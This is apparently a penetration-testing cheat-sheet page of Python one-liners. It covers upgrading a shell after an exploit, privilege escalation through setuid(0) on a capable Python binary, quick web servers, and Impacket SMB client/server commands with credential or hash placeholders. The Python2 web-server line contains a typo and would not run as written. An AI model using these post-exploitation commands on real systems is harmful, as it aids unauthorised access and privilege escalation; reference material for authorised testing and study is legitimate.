search

Python

Getting interactive shells after exploit

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

Escalate privileges if root user capability is set on Python binary (1,2)

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

The following will start a webserver in the present working directory using Python2.

python -m SimpleHTTP Server 80

The following will start a webserver in the present working directory using Python3.

python3 -m http.server 80

hashtag
Using Python Impacket - https://github.com/SecureAuthCorp/impacketarrow-up-right

SMB Client

smbclient.py [domain]/[user]:[password/password hash]@[Target IP Address]

SMB Server

smbserver.py [shareName] -smb2support -user <user> -p <password>

PreviousPowerShellNextRuby

Last updated